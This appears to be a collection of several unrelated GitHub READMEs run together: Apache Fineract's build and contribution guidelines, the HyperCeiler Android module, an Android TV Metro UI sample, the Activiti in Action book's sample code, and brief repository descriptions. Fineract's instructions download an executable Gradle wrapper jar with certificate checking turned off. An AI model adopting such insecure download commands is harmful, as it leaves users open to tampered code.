/mnt/data/ We have [some open issues in JIRA with Kubernetes related enhancement ideas](https://jira.apache.org/jira/browse/FINERACT-783?jql=labels%20%3D%20kubernetes%20AND%20project%20%3D%20%22Apache%20Fineract%22%20) which you are welcome to contribute to. INSTRUCTIONS: How to download Gradle wrapper ============ The file gradle/wrapper/gradle-wrapper.jar binary is checked into this projects Git source repository, but won't exist in your copy of the Fineract codebase if you downloaded a released source archive from apache.org. In that case, you need to download it using the commands below: wget --no-check-certificate -P gradle/wrapper https://github.com/apache/fineract/raw/develop/gradle/wrapper/gradle-wrapper.jar (or) curl --insecure -L https://github.com/apache/fineract/raw/develop/gradle/wrapper/gradle-wrapper.jar > gradle/wrapper/gradle-wrapper.jar INSTRUCTIONS: How to run Apache RAT (Release Audit Tool) ============ 1. Extract the archive file to your local directory. 2. Run `./gradlew rat`. A report will be generated under build/reports/rat/rat-report.txt INSTRUCTIONS: How to enable External Message Broker (ActiveMQ or Apache Kafka) ============ There are two use-cases where external message broker is needed: - External Business Events / Reliable Event Framework - Executing Partitioned Spring Batch Jobs External Events are business events, e.g.: `ClientCreated`, which might be important for third party systems. Apache Fineract supports ActiveMQ (or other JMS compliant brokers) and Apache Kafka endpoints for sending out Business Events. By default, they are not emitted. In case of a large deployment with millions of accounts, the Close of Business Day Spring Batch job may run several hours. In order to speed up this task, remote partitioning of the job is supported. The Manager node partitions (breaks up) the COB job into smaller pieces (sub tasks) which then can be executed on multiple Worker nodes in parallel. The worker nodes are notified either by ActiveMQ or Kafka regarding their new sub tasks. ### Active MQ JMS based messaging is disabled by default. In `docker-compose-postgresql-activemq.yml` an example is shown where ActiveMQ is enabled. In that configuration one Spring Batch Manager instance and two Spring Batch Worker instances are created. Spring based events should be disabled and jms based event handling should be enabled. Furthermore, proper broker JMS URL should be configured. ``` FINERACT_REMOTE_JOB_MESSAGE_HANDLER_JMS_ENABLED=true FINERACT_REMOTE_JOB_MESSAGE_HANDLER_SPRING_EVENTS_ENABLED=false FINERACT_REMOTE_JOB_MESSAGE_HANDLER_JMS_BROKER_URL=tcp://activemq:61616 ``` For additional ActiveMQ related configuration please take a look to the `application.properties` where the supported configuration parameters are listed with their default values. ### Kafka Kafka support also disabled by default. In `docker-compose-postgresql-kafka.yml` an example is shown where self-hosted Kafka is enabled for both External Events and Spring Batch Remote Job execution. During the development Fineract was tested with PLAINTEXT Kafka brokers without authentication and with AWS MSK using IAM authentication. The extra [jar file](https://github.com/aws/aws-msk-iam-auth/releases) required for IAM authentication is already added to the classpath. An example MSK setup can be found in `docker-compose-postgresql-kafka-msk.yml`. The full list of supported Kafka related properties are documented here: https://fineract.apache.org/docs/current/ Checkstyle and Spotless ============ This project enforces its code conventions using [checkstyle.xml](config/checkstyle/checkstyle.xml) through Checkstyle and [fineract-formatting-preferences.xml](config/fineract-formatting-preferences.xml) through Spotless. They are configured to run automatically during the normal Gradle build, and fail if there are any violations detected. You can run the following command to automatically fix spotless violations: `./gradlew spotlessApply` Since some checks are present in both Checkstyle and Spotless, the same command can help you fix some of the Checkstyle violations (but not all, other Checkstyle violations need to fixed manually). You can also check for Spotless violations (only; but normally don't have to, because the regular build full already includes this anyway): `./gradlew spotlessCheck` We recommend that you configure your favourite Java IDE to match those conventions. For Eclipse, you can go to Window > Java > Code Style and import our [config/fineractdev-formatter.xml](config/fineractdev-formatter.xml) under formatter section and [config/fineractdev-cleanup.xml](config/fineractdev-cleanup.xml) under Clean up section. The same fineractdev-formatter.xml configuration file (that can be used in Eclipse IDE) is also used by Spotless to both check for violations and autoformat code on the CLI. You could also use Checkstyle directly in your IDE (but you don't neccesarily have to, it may just be more convenient for you). For Eclipse, use https://checkstyle.org/eclipse-cs/ and load our checkstyle.xml into it, for IntelliJ you can use [CheckStyle-IDEA](https://plugins.jetbrains.com/plugin/1065-checkstyle-idea). Code Coverage Reports ============ The project uses Jacoco to measure unit tests code coverage, to generate a report run the following command: `./gradlew clean build jacocoTestReport` Generated reports can be found in build/code-coverage directory. Versions ============ The latest stable release can be viewed on the develop branch: [Latest Release on Develop](https://github.com/apache/fineract/tree/develop "Latest Release"). The progress of this project can be viewed here: [View change log](https://github.com/apache/fineract/blob/develop/CHANGELOG.md "Latest release change log") License ============ This project is licensed under Apache License Version 2.0. See <https://github.com/apache/incubator-fineract/blob/develop/LICENSE.md> for reference. The Connector/J JDBC Driver client library from MariaDB.org, which is licensed under the LGPL, is used in development when running integration tests that use the Liquibase library. That JDBC driver is however not included in and distributed with the Fineract product and is not required to use the product. If you are developer and object to using the LGPL licensed Connector/J JDBC driver, simply do not run the integration tests that use the Liquibase library and/or use another JDBC driver. As discussed in [LEGAL-462](https://issues.apache.org/jira/browse/LEGAL-462), this project therefore complies with the [Apache Software Foundation third-party license policy](https://www.apache.org/legal/resolved.html). <br><br>APACHE FINERACT PLATFORM API ============ The API for Fineract is documented in [apiLive.htm](fineract-provider/src/main/resources/static/legacy-docs/apiLive.htm), and the [apiLive.htm can be viewed on fineract.apache.org](https://fineract.apache.org/docs/legacy/ "API Documentation"). If you have your own Fineract instance running, you can find this documentation under [/fineract-provider/legacy-docs/apiLive.htm](https://localhost:8443/fineract-provider/legacy-docs/apiLive.htm). The Swagger documentation (work in progress; see [FINERACT-733](https://issues.apache.org/jira/browse/FINERACT-733)) can be accessed under [/fineract-provider/swagger-ui/index.html](https://localhost:8443/fineract-provider/swagger-ui/index.html) and [live Swagger UI here on Fineract.dev](https://sandbox.mifos.community/fineract-provider/swagger-ui/index.html). Apache Fineract supports client code generation using [Swagger Codegen](https://github.com/swagger-api/swagger-codegen) based on the [OpenAPI Specification](https://swagger.io/specification/). For more instructions on how to generate the client code, check [docs/developers/swagger/client.md](docs/developers/swagger/client.md). <br>API CLIENTS (Web UIs, Mobile, etc.) ============ * https://github.com/openMF/community-app/ is the "traditional" Reference Client App Web UI for the API offered by this project * https://github.com/openMF/web-app is the next generation UI rewrite also using this project's API * https://github.com/openMF/android-client is an Android Mobile App client for this project's API * https://github.com/openMF has more related proejcts <br>ONLINE DEMOS ============ * [sandbox.mifos.community](https://sandbox.mifos.community) always runs the latest version of this code * [demo.mifos.io](https://demo.mifos.io) A demo account is provided for users to experience the functionality of the Community App. Users can use "mifos" for USERNAME and "password" for PASSWORD (without quotation marks). * [Swagger-UI Demo video](https://www.youtube.com/watch?v=FlVd-0YAo6c) This is a demo video for Swagger-UI documentation, more information [here](https://github.com/apache/fineract#swagger-ui-documentation). <br>DEVELOPERS ============ Please see <https://cwiki.apache.org/confluence/display/FINERACT/Contributor%27s+Zone> for the developers wiki page. Please refer to <https://cwiki.apache.org/confluence/display/FINERACT/Fineract+101> for the first-time contribution to this project. Please see <https://cwiki.apache.org/confluence/display/FINERACT/How-to+articles> for technical details to get started. Please visit [our JIRA Dashboard](https://issues.apache.org/jira/secure/Dashboard.jspa?selectPageId=12335824) to find issues to work on, see what others are working on, or open new issues. <br>VIDEO DEMONSTRATION ============ Apache Fineract / Mifos X Demo (November 2016) - <https://www.youtube.com/watch?v=h61g9TptMBo> <br>SWAGGER UI DEMONSTRATION ============ We use Swagger-UI to generate and maintain our API documentation, you can see the demo video [here](https://www.youtube.com/watch?v=FlVd-0YAo6c) or a live version [here](https://sandbox.mifos.community/fineract-provider/swagger-ui/index.html). If you interested to know more about Swagger-UI you can check their [website](https://swagger.io/). <br>GORVENANCE AND POLICIES ======================= [Becoming a Committer](https://cwiki.apache.org/confluence/display/FINERACT/Becoming+a+Committer) documents the process through which you can become a committer in this project. <br>ERROR HANDLING GUIDELINES ------------------ * When catching exceptions, either rethrow them, or log them. Either way, include the root cause by using `catch (SomeException e)` and then either `throw AnotherException("..details..", e)` or `LOG.error("...context...", e)`. * Completely empty catch blocks are VERY suspicous! Are you sure that you want to just "swallow" an exception? Really, 100% totally absolutely sure?? ;-) Such "normal exceptions which just happen sometimes but are actually not really errors" are almost always a bad idea, can be a performance issue, and typically are an indication of another problem - e.g. the use of a wrong API which throws an Exception for an expected condition, when really you would want to use another API that instead returns something empty or optional. * In tests, you'll typically never catch exceptions, but just propagate them, with `@Test void testXYZ() throws SomeException, AnotherException`..., so that the test fails if the exception happens. Unless you actually really want to test for the occurence of a problem - in that case, use [JUnit's Assert.assertThrows()](https://github.com/junit-team/junit4/wiki/Exception-testing) (but not `@Test(expected = SomeException.class)`). * Never catch `NullPointerException` & Co. <br>LOGGING GUIDELINES ------------------ * We use [SLF4J](http://www.slf4j.org) as our logging API. * Never, ever, use `System.out` and `System.err` or `printStackTrace()` anywhere, but always `LOG.info()` or `LOG.error()` instead. * Use placeholder (`LOG.error("Could not... details: {}", something, exception)`) and never String concatenation (`LOG.error("Could not... details: " + something, exception)`) * Which Log Level is appropriate? * `LOG.error()` should be used to inform an "operator" running Fineract who supervises error logs of an unexpected condition. This includes technical problems with an external "environment" (e.g. can't reach a database), and situations which are likely bugs which need to be fixed in the code. They do NOT include e.g. validation errors for incoming API requests - that is signaled through the API response - and does (should) not be logged as an error. (Note that there is no _FATAL_ level in SLF4J; a "FATAL" event should just be logged as an _ERROR_.) * `LOG.warn()` should be using sparingly. Make up your mind if it's an error (above) - or not! * `LOG.info()` can be used notably for one-time actions taken during start-up. It should typically NOT be used to print out "regular" application usage information. The default logging configuration always outputs the application INFO logs, and in production under load, there's really no point to constantly spew out lots of information from frequently traversed paths in the code about what's going on. (Metrics are a better way.) `LOG.info()` *can* be used freely in tests though. * `LOG.debug()` can be used anywhere in the code to log things that may be useful during investigations of specific problems. They are not shown in the default logging configuration, but can be enabled for troubleshooting. Developers should typically "turn down" most `LOG.info()` which they used while writing a new feature to "follow along what happens during local testing" to `LOG.debug()` for production before we merge their PRs. * `LOG.trace()` is not used in Fineract. Pull Requests ------------- We request that your commit message include a FINERACT JIRA issue, recommended to be put in parentheses at the end of the first line. Start with an upper case imperative verb (not past form), and a short but concise clear description. (E.g. _Add enforced HideUtilityClassConstructor checkstyle (FINERACT-821)_ or _Fix inability to reschedule when interest accrued larger than EMI (FINERACT-1109)_ etc.). If your PR is failing to pass our CI build due to a test failure, then: 1. Understand if the failure is due to your PR or an unrelated unstable test. 1. If you suspect it is because of a "flaky" test, and not due to a change in your PR, then please do not simply wait for an active maintainer to come and help you, but instead be a proactive contributor to the project - see next steps. Do understand that we may not review PRs that are not green - it is the contributor's (that's you!) responsability to get a proposed PR to pass the build, not primarily the maintainers. 1. Search for the name of the failed test on https://issues.apache.org/jira/, e.g. for `AccountingScenarioIntegrationTest` you would find [FINERACT-899](https://issues.apache.org/jira/browse/FINERACT-899). 1. If you happen to read in such bugs that tests were just recently fixed, or ignored, then rebase your PR to pick up that change. 1. If you find previous comments "proving" that the same test has arbitrarily failed in at least 3 past PRs, then please do yourself raise a small separate new PR proposing to add an `@Disabled // TODO FINERACT-123` to the respective unstable test (e.g. [#774](https://github.com/apache/fineract/pull/774)) with the commit message mentioning said JIRA, as always. (Please do NOT just `@Disabled` any existing tests mixed in as part of your larger PR.) 1. If there is no existing JIRA for the test, then first please evaluate whether the failure couldn't be a (perhaps strange) impact of the change you are proposing after all. If it's not, then please raise a new JIRA to document the suspected Flaky Test, and link it to [FINERACT-850](https://issues.apache.org/jira/browse/FINERACT-850). This will allow the next person coming along hitting the same test failure to easily find it, and eventually propose to ignore the unstable test. 1. Then (only) Close and Reopen your PR, which will cause a new build, to see if it passes. 1. Of course, we very much appreciate you then jumping onto any such bugs and helping us figure out how to fix all ignored tests! [Pull Request Size Limit](https://cwiki.apache.org/confluence/display/FINERACT/Pull+Request+Size+Limit) documents that we cannot accept huge "code dump" Pull Requests, with some related suggestions. Guideline for new Feature commits involving Refactoring: If you are submitting PR for a new Feature, and it involves refactoring, try to differentiate "new Feature code" with "Refactored" by placing them in different commits. This helps review to review your code faster. We have an automated Bot which marks pull requests as "stale" after a while, and ultimately automatically closes them. Merge Strategy -------------- This project's committers typically prefer to bring your Pull Requests in through _Rebase and Merge_ instead of _Create a Merge Commit_. (If you are unfamiliar with GitHub's UI re. this, note the somewhat hidden little triangle drop-down at the bottom of PR, visible only to committers, not contributors.) This avoids the "merge commits" which we consider to be somewhat "polluting" the projects commits log history view. We understand this doesn't give an easy automatic reference to the original PR (which GitHub automatically adds to the Merge Commit message it generates), but we consider this an only very minor inconvenience; it's typically relatively easy to find the original PR even just from the commit message, and JIRA. We expect most proposed PRs to typically consist of a single commit. Committers may use _Squash and merge_ to combine your commits at merge time, and if they do so will rewrite your commit message as they see fit. Neither of these two are hard absolute rules, but mere conventions. Multiple commits in single PR make sense in certain cases (e.g. branch backports). Dependency Upgrades ------------------- This project uses a number of 3rd-party libraries, and this section provides some guidance for their updates. We have set-up [Renovate's bot](https://renovate.whitesourcesoftware.com) to automatically raise Pull Requests for our review when new dependencies are available [FINERACT-962](https://issues.apache.org/jira/browse/FINERACT-962). Upgrades sometimes require package name changes. Changed code should ideally have test coverage. Our `ClasspathHellDuplicatesCheckRuleTest` detects classes that appear in more than 1 JAR. If a version bump in [`build.gradle`](https://github.com/search?q=repo%3Aapache%2Ffineract+filename%3Abuild.gradle&type=Code&ref=advsearch&l=&l=) causes changes in transitives dependencies, then you may have to add related `exclude` to our [`dependencies.gradle`](https://github.com/apache/fineract/search?q=dependencies.gradle). Running `./gradlew dependencies` helps to understand what is required. More Information ============ More details of the project can be found at <https://cwiki.apache.org/confluence/display/FINERACT>.
MIUI & HyperOS enhancement module - Make MIUI & HyperOS Great Again!
<div align="center"> <img src="/imgs/icon.png" width="160" height="160" style="display: block; margin: 0 auto;" alt="icon"> # HyperCeiler ### Make HyperOS/MIUI Great Again! 简体中文&nbsp;&nbsp;|&nbsp;&nbsp;[English](/README_en-US.md)&nbsp;&nbsp;|&nbsp;&nbsp;[Português (Brasil)](/README_pt-BR.md) </div> ## 当前支持的版本 Android 13-14 的 MIUI 和 HyperOS 注:Android 11-12 将在后续版本陆续停止支持, 当前系统框架、系统界面、系统桌面、手机管家作用域不支持 Android 11-12 的 MIUI ## 使用前说明 请在 [LSPosed](https://github.com/LSPosed/LSPosed/releases) 中启用 HyperCeiler, 然后在 HyperCeiler 应用内启用对应的功能,重启作用域 (需要 Root 权限); 本模块<b>不支持</b> `修改较多的第三方 MIUI/Xiaomi HyperOS ROM`、`修改较多的系统软件`,以及`部分国际 MIUI/Xiaomi HyperOS ROM`; 目前 HyperCeiler 是基于 Android 14 的 Xiaomi HyperOS1.0 的手机端设备进行适配,覆盖不是很完整,需要不断测试和改进 提交反馈前请注意是否已有相同反馈,避免给开发者造成困扰。花相同精力看相同反馈是一件很浪费时间的事情 HyperCeiler 已停止维护 Android 11-12 的 MIUI ROM,当前除系统框架、系统界面等核心作用域,原则上其他作用域可正常使用,核心作用域如需使用请停留[此版本](https://github.com/ReChronoRain/Cemiuiler/releases/tag/1.3.130) ## 作用域包含的应用 <details> <summary>点击展开折叠的内容</summary> | 应用名 | 包名 | |:----------------------|:-----------------------------------| | 系统框架 | system | | 系统界面 | com.android.systemui | | 系统桌面 | com.miui.home | | 系统更新 | com.android.updater | | Joyose | com.xiaomi.joyose | | 小米设置 | com.xiaomi.misettings | | 安全服务 (手机管家、平板管家) | com.miui.securitycenter | | 笔记 | com.miui.notes | | 壁纸 | com.miui.miwallpaper | | 传送门 | com.miui.contentextension | | 弹幕通知 | com.xiaomi.barrage | | 电话 | com.android.incallui | | 电话服务 | com.android.phone | | 电量与性能 | com.miui.powerkeeper | | 短信 | com.android.mms | | 截屏 | com.miui.screenshot | | 日历 | com.android.calendar | | 浏览器 | com.android.browser | | 鲁班(MTB) | com.xiaomi.mtb | | 屏幕录制 | com.miui.screenrecorder | | 权限管理服务 | com.lbe.security.miui | | 设置 | com.android.settings | | 搜狗输入法小米版 | com.sohu.inputmethod.sogou.xiaomi | | 天气 | com.miui.weather2 | | 互联互通服务 (投屏) | com.milink.service | | 跨屏协同服务 (MIUI+ Beta 版) | com.xiaomi.mirror | | 外部存储设备 | com.android.externalstorage | | 息屏与锁屏编辑 (万象息屏) | com.miui.aod | | 文件管理 | com.android.fileexplorer | | 系统服务组件 | com.miui.securityadd | | 下载管理 | com.android.providers.downloads.ui | | 下载管理程序 | com.android.providers.downloads | | 相册 | com.miui.gallery | | 小米创作 | com.miui.creation | | 小米互传 | com.miui.mishare.connectivity | | 小米相册 - 编辑 | com.miui.mediaeditor | | 小米云服务 | com.miui.cloudservice | | 小米智能卡 | com.miui.tsmclient | | 讯飞输入法小米版 | com.iflytek.inputmethod.miui | | 应用包管理组件 | com.miui.packageinstaller | | 应用商店 | com.xiaomi.market | | 智能助理 | com.miui.personalassistant | | 主题商店 (主题壁纸、壁纸与个性化) | com.android.thememanager | | 系统安全组件 | com.miui.guardprovider | | 相机 | com.android.camera | | 小爱翻译 | com.xiaomi.aiasst.vision | | 小爱视觉 | com.xiaomi.scanner | | 小爱同学 | com.miui.voiceassist | | NFC 服务 | com.android.nfc | | 音质音效 | com.miui.misound | | 备份 | com.miui.backup | | 小米换机 | com.miui.huanji | | MiTrustService | com.xiaomi.trustservice | </details> > 与 LSPosed 中推荐的作用域相同 ## 交流 & 反馈群组 加入我们所创建的群组以反馈问题或是了解最新情况。 [![badge_qgroup]][qgroup_url] [![badge_qguild]][qguild_url] [![badge_telegram]][telegram_url] ## 为 HyperCeiler 贡献翻译 [![Crowdin](https://badges.crowdin.net/cemiuiler/localized.svg)](https://crowdin.com/project/cemiuiler) 您可以在[这里](https://crwd.in/cemiuiler)为 HyperCeiler 项目贡献翻译。 ## 感谢 > HyperCeiler 使用了以下开源项目的部分或全部内容,感谢这些项目的开发者提供的大力支持(排名顺序不分先后)。 - [「Accompanist」 by Android Open Source Project, Google Inc.](https://google.github.io/accompanist) - [「Android」 by Android Open Source Project, Google Inc.](https://source.android.google.cn/license) - [「AndroidHiddenApiBypass」 by LSPosed](https://github.com/LSPosed/AndroidHiddenApiBypass) - [「AndroidX」 by Android Open Source Project, Google Inc.](https://github.com/androidx/androidx) - [「AntiAntiDefraud」 by MinaMichita](https://github.com/MinaMichita/AntiAntiDefraud) - [「Auto NFC」 by GSWXXN](https://github.com/GSWXXN/AutoNFC) - [「BypassSignCheck」 by Weverses](https://github.com/Weverses/BypassSignCheck) - [「CorePatch」 by LSPosed](https://github.com/LSPosed/CorePatch) - [「CustoMIUIzer」 by MonwF](https://github.com/MonwF/customiuizer) - [「CustoMIUIzerMod」 by liyafe1997](https://github.com/liyafe1997/CustoMIUIzerMod) - [「ClipboardList」 by 焕晨HChen](https://github.com/HChenX/ClipboardList) - [「DexKit」 by LuckyPray](https://github.com/LuckyPray/DexKit) - [「Disable app link verify」 by tehcneko](https://github.com/Xposed-Modules-Repo/io.github.tehcneko.applinkverify) - [「DisableFlagSecure」 by LSPosed](https://github.com/LSPosed/DisableFlagSecure) - [「DisableLogRequest」 by QueallyTech](https://github.com/QueallyTech/DisableLogRequest) - [「EzXHelper」 by KyuubiRan](https://github.com/KyuubiRan/EzXHelper) - [「FixMiuiMediaControlPanel」 by qqlittleice](https://github.com/qqlittleice/FixMiuiMediaControlPanel) - [「FuckNFC」 by xiaowine](https://github.com/xiaowine/FuckNFC) - [「ForegroundPin」 by 焕晨HChen](https://github.com/HChenX/ForegroundPin) - [「Gson」 by Android Open Source Project, Google Inc.](https://github.com/google/gson) - [「Hyper Helper」 by HowieHChen](https://github.com/HowieHChen/XiaomiHelper) - [「HideMiuiClipboardDialog」 by zerorooot](https://github.com/zerorooot/HideMiuiClipboardDialog) - [「HyperSmartCharge」 by buffcow](https://github.com/buffcow/HyperSmartCharge) - [「Kotlin」 by JetBrains](https://github.com/JetBrains/kotlin) - [「MaxFreeForm」 by YifePlayte](https://github.com/YifePlayte/MaxFreeForm) - [「MediaControl-BlurBg」 by YuKongA](https://github.com/YuKongA/MediaControl-BlurBg) - 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1、仿泰捷视频最新TV版 Metro UI效果. 2、仿腾讯视频TV版(云视听·极光) 列表页
android-tv metro-ui
# Some Android TV related Sample ## [中文README](/README_CN.md) 更多TV相关,欢迎关注公众号: ![这里写图片描述](https://github.com/hejunlin2013/RedPackage/blob/master/image/qrcode.jpg) Android TV开发交流群:135622564 --- ## 1.Imitation of tai jie latest TV video version of the Metro UI Android TV development cannot leave the Metro UI, first to see the latest Thai TV of the members area renderings, belongs to the typical style of Metro, as follows: ![这里写图片描述](/images/device-2016-10-13-170829.png) ### What is the Metro UI: Metro design idea comes from transport airport the sign at the bus stop and subway sign inspired Microsoft design team, design team said Metro is derived from the King County, Washington, us will transport (the King County Metro) logo design, the style of use large fonts, can attract the attention of the audience. Microsoft thinks Metro design [2] topic should be: \"smooth, fast, modern\". Metro also differs from that of Android and iOS icon design. ### Metro UI software Metro is for the convenience of Microsoft developers write Metro style applications and provide a development platform, you can call Microsoft WinRT exposed interface write Metro style applications. And Metro style controls [3] to expand doing standard control methods and properties, some new functions, such as Component One Studio for WinRT XAML, Component One Studio for WinJS. In Windows open Windows application market also use and Metro style interface is recommended for the application. Metro interface, boot after first greeted the first interface, personal feeling is mainly designed to touchscreen devices, but also to use the same in the TV is convenient. We installed in the Desktop program and download in the app store will be displayed in the Metro, so we should regularly or irregularly on the grouping, sequencing, sorting, to facilitate our operation and beautiful interface. Metro interface provides a convenient options at the same time, make the operation more convenient. Today to follow and implement the Metro interface, the following is my implementation effect: ![这里写图片描述](/images/device-2016-10-13-192016.png) ![这里写图片描述](/images/device-2016-10-13-191954.png) GIF: (for has not a good record on TV screen tools, box system generally less than 5.0, some manufacturers have rose to 5.0, I'm using the i71, very old box, based on the API 17, 4.2.2) ![这里写图片描述](/images/metro.gif) ##2.Imitation tencent video TV version (cloud audio-visual aurora) list page( use RecycleView plus GridLayoutManager) To see the latest tencent video TV version of the TV playlist page, as follows: ![这里写图片描述](/images/device-2016-10-17-141123.png) Today to follow and implement the tencent video TV version of the TV playlist page, the following is my implementation effect: ![这里写图片描述](/images/device-2016-10-17-151218.png) ![这里写图片描述](/images/device-2016-10-17-145135.png) gif: ![这里写图片描述](/images/recycleview_1.gif) ![这里写图片描述](/images/recycleview_2.gif) #### Welcome to follow my personal WeChat Official Accounts, useful android technology, conclusion for bug, the FrameWork source code analysis, plugin research, the latest open source projects recommended ![这里写图片描述](https://github.com/hejunlin2013/RedPackage/blob/master/image/qrcode.jpg) License -------- ``` Copyright (C) 2016 hejunlin Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ```
《Activiti实战》示例源码 ======================== Activiti官方唯一推荐中文书籍——《Activiti实战》示例源码 Activiti项目负责人Tijs Rademakers高度认可并推荐,根据Activiti新版本系统、深度讲解了BPMN2.0规范,以及Activiti功能、用法、技巧、实践和源代码分析。 > 如果发现代码有问题请到 http://www.kafeitu.me/activiti-in-action.html 页面给我留言或者发邮件到 yanhonglei@gmail.com,多谢支持。 <img src="http://www.kafeitu.me/images/activiti-in-action.jpg" width="510" /> # 编辑推荐 《Activiti实战》是国内Activiti领域第一人撰写,Activiti项目负责人Tijs Rademakers高度认可并推荐; 《Activiti实战》根据Activiti最新版本系统、深度讲解了BPMN2.0规范,以及Activiti功能、用法、技巧、最佳实践和源代码分析。 # 内容简介 《Activiti实战 》立足于实践,不仅让读者知其然,全面掌握Activiti架构、功能、用法、技巧和最佳实践,广度足够;而且让读者知其所以然,深入理解Activiti的源代码实现、设计模式和PVM,深度也足够。 《Activiti实战 》一共四个部分:准备篇(1至2章)介绍了Activiti的概念、特点、应用、体系结构,以及开发环境的搭建和配置;基础篇(3至4章)首先讲解了Activiti Modeler、Activiti Designer两种流程设计工具的详细使用,然后详细讲解了BPMN2.0规范;实战篇(5至14章)系统讲解了Activiti的用法、技巧和最佳实践,包含流程定义、流程实例、任务、子流程、多实例、事件以及监听器等;高级篇(15至21)通过集成WebService、规则引擎、JPA、ESB等各种服务和中间件来阐述了Activiti不仅仅是引擎,实际上是一个BPM平台,最后还通过源代码对它的设计模式及PVM进行了分析。 # 作者简介 闫洪磊(咖啡兔),资深软件开发工程师和架构师,为Activiti贡献了大量代码,为Activiti在中国的推广与普及做了大量的工作,在社群中有很高的威望和知名度,被称为中国Activiti领域的第一人。多年来一直从事OA、ERP等系统的开发与架构设计工作,持续关注并深入研究工作流引擎,目前就职于小马购车,担任架构师一职,并负责公司内部工作流平台的建设工作。 # 精彩书评 >Tijs Rademakers——Activiti 项目负责人 Henry Yan has been a longtime valued contributor to the Activiti project, both for his commits and for promoting Activiti in China through his community and blog site (http://www.kafeitu.me/activiti.html). It’s great to see his Activiti book as it brings a lot of value for Activiti users and developers in China. With Henry Yan’s background in the Activiti project I highly recommend this book for new Activiti users as well as developers already using Activiti. 长期以来,Henry Yan通过他的社区及博客一直致力于在中国广泛推广Activiti,为Activiti项目做出了巨大(或宝贵)贡献。很高兴看到他的《Activiti实战》一书将为Activiti 的中国使用者及开发者提供非常多的重要价值。在Activiti项目方面,Henry Yan具有非常专业的背景经验,在此,我向各位包括已经在使用Activiti的开发者及Activiti新手极力推荐此书。 >徐会生(临远)——jBPM国内推广者,Activiti国内推广者 咖啡兔同学的《Activiti实战》终于出炉,欣喜之情溢于言表。国内的工作流行业虽然产品繁多,但是开源一直为Activiti和jBPM垄断,相对来言Activiti延续了一贯方便灵活的特性,又不会在功能上有半分折损,在国内拥有大量的粉丝。咖啡兔同学此前一直致力于Activiti在国内的推广与传播,先后开辟了专栏博客、Activiti论坛网站、QQ群组,并积极参与Activiti的官方开发,可以说Activiti在国内能达到当前的认知程度,他是功不可没的。可惜,国内尚缺一本可以为Activiti新手答疑解惑,带初阶者更上一层楼的实体书籍。那么我觉得,这个任务由一直积极活跃于Activiti开源社区,既拥有实际流程项目设计研发经验,又为Activiti官方内核提交过代码的人是再合适不过了。 全书由浅入深的引导读者进入工作流的殿堂,不仅覆盖常见的流程功能与实现方法,还专门提供了作者实践中总结的经验方法,这本书必将成为学习流程道路上的得力助手。 >袁启勋(北京信舟科技创始人) 在开源BPM领域,你或许不知道“闫洪磊”是谁,但你必须听说过“咖啡兔”,否则,你不能说你曾经玩过开源BPM! 咖啡兔是我从事BPM工作几年来,少有的一位对BPM领域有较深认识的人,同时他对于开源界热情的、积极的、无私的贡献精神,让我感动。我们信舟科技SuperBPM平台的诞生,离不开咖啡兔提供的巨大 帮助,在此表示感谢。Activiti是一个优秀的项目,让我们能够很容易的将BPM引入我们的企业级应用中,但Activiti毕竟是国外的开源产品,她与国内很多BPM应用还是有些差异,我们还需要对其做一些必要的个性化扩展和补充,才能用于我们实际的企业应用。目前国内关于Activiti的专业资料,几乎没有,而《Activiti实战》无疑是目前最佳的入门宝典,书中介绍了很多案例,都是实际BPM应用中总结的宝贵经验,相信你们将与我一样从中受益,并快速的将Activiti集成到自己的企业应用中,让Activiti绽放光芒。 >Robinson(edoc2 CTO ) 自2010年Tom Bayen离开jBoss加入Afresco公司开发出Activit5,在短短几年时间内,国内有着大批企事业单位和大型金融机构基于Activiti5来构建各类业务流程系统,那是因为 Activiti功能稳定、性能良好、对BPMN2规范的完全支持、API应用友好性和扩展性方面都有 着卓越的表现。个人从2010年接触工作流至今已15年,认为Activti5是完全可以与Ultimus 、K2等大型商用工作流引擎相媲美的大型开源产品,加上国内有着咖啡兔等众多开源奉献者和非常活跃地社区支持,相信Activiti在国内BPM界会发挥更大地作用和价值,也希望这本汇集的各种实战经验能帮助读者深入了解Activiti。 # 立即购买 * 华章自营China-pub:http://product.china-pub.com/3770832 * 京东:http://item.jd.com/11599588.html * 当当:http://product.dangdang.com/23622065.html * 淘宝:自己搜索吧,但请支持正版 # 下载依赖失败解决办法 鉴于国内网络特殊问题,`建议`使用**开源中国**提供的Maven仓库代理中央仓库,参考 [http://maven.oschina.net/help.html](http://maven.oschina.net/help.html) 推荐`settings.xml`内容: ```xml <?xml version="1.0" encoding="UTF-8"?> <settings xmlns="http://maven.apache.org/settings/1.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/SETTINGS/1.0.0 http://maven.apache.org/xsd/settings-1.0.0.xsd"> <mirrors> <!-- mirror | Specifies a repository mirror site to use instead of a given repository. The repository that | this mirror serves has an ID that matches the mirrorOf element of this mirror. IDs are used | for inheritance and direct lookup purposes, and must be unique across the set of mirrors. | --> <mirror> <id>nexus-osc</id> <mirrorOf>central</mirrorOf> <name>Nexus osc</name> <url>http://maven.oschina.net/content/groups/public/</url> </mirror> <mirror> <id>nexus-osc-thirdparty</id> <mirrorOf>thirdparty</mirrorOf> <name>Nexus osc thirdparty</name> <url>http://maven.oschina.net/content/repositories/thirdparty/</url> </mirror> </mirrors> </settings> ``` # 那啥 没有买书?觉得源码有料?买本书吧,也就少喝两杯咖啡而已~~~
A demo show how to use Retrofit with Rxjava
# Retrofit与Rxjava结合的实例 1. RxJava如何与Retrofit结合 2. 相同格式的Http请求数据该如何封装 3. 相同格式的Http请求数据统一进行预处理 4. 如何取消一个Http请求 5. 一个需要ProgressDialog的Subscriber该有的样子
Gradle plugin for managing Docker images and containers.
docker gradle-plugin
Set of extra Transitions on top of Jetpack Transitions Library
